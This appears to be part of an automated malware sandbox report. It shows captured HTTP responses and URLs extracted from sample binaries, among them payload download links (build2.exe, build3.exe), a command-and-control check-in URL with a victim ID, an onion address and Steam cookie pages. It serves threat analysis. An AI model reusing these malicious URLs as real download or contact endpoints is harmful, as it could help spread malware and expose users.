Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:23 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 89 43 14 78 1d e4 a3 8f ba a8 15 ea 1f d1 6f f8 62 7a b9 35 e3 e8 2d e9 3f 46 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OCxobz5-?FP0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:24 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:24 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:24 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 35 45 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 83 54 0e 7d 17 be a1 83 bd ad 1d a1 52 dd 6d ba 19 59 9d 09 f4 a6 2d af 7b 64 0f a5 b4 89 18 c9 2d 84 1b 8f be 42 c3 5c 9a d3 f7 27 69 98 d0 4b 6b 80 a7 b4 0e 89 d3 cf 37 b2 33 ce 98 77 4d 1a 7d 4b 47 98 fc 64 a0 f2 5c 90 0d 0a 30 0d 0a 0d 0a Data Ascii: 5EI:82OT}RmY-{d-B\'iKk73wM}KGd\0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:27 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 8d 43 09 65 0b f9 aa 85 a1 e4 12 ab 11 91 67 e7 55 5d 91 03 f2 eb 78 e1 2c 01 4e bf ae d8 1b ec 07 8f 46 87 ad 76 87 24 e9 ae 93 01 22 ee a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OCegU]x,NFv$"c0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:30 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:30 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 43 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 bc 51 de 4b d1 fb 25 83 2a e8 ae 95 58 2d e4 be 41 2d fa a5 b4 6a f3 91 be 5a a8 74 9e c9 37 40 5a 3c 0d 4f df a6 3d fd dd 47 87 ad d3 1a d1 3b 93 84 69 77 3c f0 29 76 94 c8 9e 94 25 ff 60 18 88 4a ef 0a ea e3 d2 63 d1 82 f6 31 db 7f f3 ae 9a e0 5c 8c c0 97 18 1f c4 5f fe bc bf c1 fa ad 12 15 a9 2e 8b de 22 82 7f 65 46 b7 8d ab e6 a9 41 b9 1d 34 99 97 be ea 8b e6 78 82 74 34 36 6a 3a eb 87 09 c7 29 aa af ae 2e c0 d5 85 04 4e 30 63 cc 0d 0a 30 0d 0a 0d 0a Data Ascii: C5I:82OB%,YR("XQK%*X-A-jZt7@Z<O=G;iw<)v%`Jc1\_."eFA4xt46j:).N0c0
Source: build2.exe, 00000029.00000003.3165856332.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3163548455.0000000000970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C47C000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3193553866.000000000C46C000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3193553866.000000000C41A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
Source: 71C9.exe, 0000001D.00000002.3193553866.000000000C41A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionhttp://3ebu257qh2dlauxqj7cgv3i5
Source: A0B.exe, 00000017.00000003.3035541738.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: A0B.exe, 00000017.00000003.3035541738.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000002.00000000.2110113315.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2110113315.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4430589256.0000000007DAF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3221948126.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4425761719.0000000007DAF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3200368810.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3238956832.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3205407154.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4532188643.0000000007DB0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3196138962.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.g
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: A0B.exe, 00000017.00000003.3035541738.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: A0B.exe, 00000017.00000003.3035541738.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: A0B.exe, 00000017.00000003.3035541738.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3356770274.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000002.00000000.2110113315.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2110113315.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4430589256.0000000007DAF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3221948126.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4425761719.0000000007DAF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3200368810.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3238956832.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3205407154.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4532188643.0000000007DB0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3196138962.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: A0B.exe, 00000017.00000003.3035541738.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: build2.exe, 00000029.00000003.3356770274.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000002.00000000.2110113315.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2110113315.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4430589256.0000000007DAF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3221948126.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4425761719.0000000007DAF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3200368810.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3238956832.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3205407154.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4532188643.0000000007DB0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3196138962.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: A0B.exe, 00000017.00000003.3035541738.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, 71C9.exe, 0000001D.00000002.3185463938.000000000385C000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://https://_bad_pdb_file.pdb
Source: DB15.exe, 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DB15.exe, 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, DB15.exe, 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: http://invalidlog.txtlookup
Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: http://localhost:3433/https://duniadekho.baridna:
Source: explorer.exe, 00000002.00000000.2110113315.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2110113315.000000000973C000.00000004.00000001.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3035541738.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4430589256.0000000007DAF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3221948126.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4425761719.0000000007DAF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3200368810.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3238956832.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3205407154.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4532188643.0000000007DB0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3196138962.0000000007DA8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3356770274.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: build2.exe, 00000029.00000003.3356577230.0000000000A29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000002.00000000.2110113315.000000000962B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: A0B.exe, 00000017.00000003.3035541738.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: DB15.exe, 00000013.00000002.4517742104.0000000000621000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4517742104.00000000005D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sajdfue.com/files/1/build3.exe
Source: DB15.exe, 00000013.00000002.4517742104.0000000000587000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sajdfue.com/files/1/build3.exe$run
Source: DB15.exe, 00000013.00000002.4517742104.0000000000587000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sajdfue.com/files/1/build3.exe$runq
Source: DB15.exe, 00000013.00000002.4517742104.00000000005D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sajdfue.com/files/1/build3.exerun85
Source: DB15.exe, 00000011.00000002.4519701063.0000000000602000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4517742104.0000000000587000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4517742104.00000000005E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sajdfue.com/test1/get.php
Source: DB15.exe, 00000011.00000002.4519701063.0000000000602000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sajdfue.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
Source: DB15.exe, 00000013.00000002.4517742104.0000000000548000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sajdfue.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true
Source: DB15.exe, 00000011.00000002.4519701063.0000000000602000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sajdfue.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4;05d
Source: DB15.exe, 00000011.00000002.4519701063.0000000000602000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sajdfue.com/test1/get.phpb
Source: explorer.exe, 00000002.00000000.2109312411.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2109326155.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2107101000.00000000028A0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: DB15.exe, 00000013.00000002.4517742104.0000000000587000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4517742104.00000000005D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sdfjhuz.com/dl/build2.exe
Source: DB15.exe, 00000013.00000002.4517742104.0000000000587000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sdfjhuz.com/dl/build2.exe$run
Source: DB15.exe, 00000013.00000002.4517742104.0000000000587000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sdfjhuz.com/dl/build2.exe:
Source: DB15.exe, 00000013.00000002.4517742104.00000000005D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sdfjhuz.com/dl/build2.exeruneer
Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
Source: build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: build2.exe, 00000029.00000002.3568020251.0000000000431000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3188437958.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3200438475.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3176880709.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3213076391.0000000000970000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000003.3164381859.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
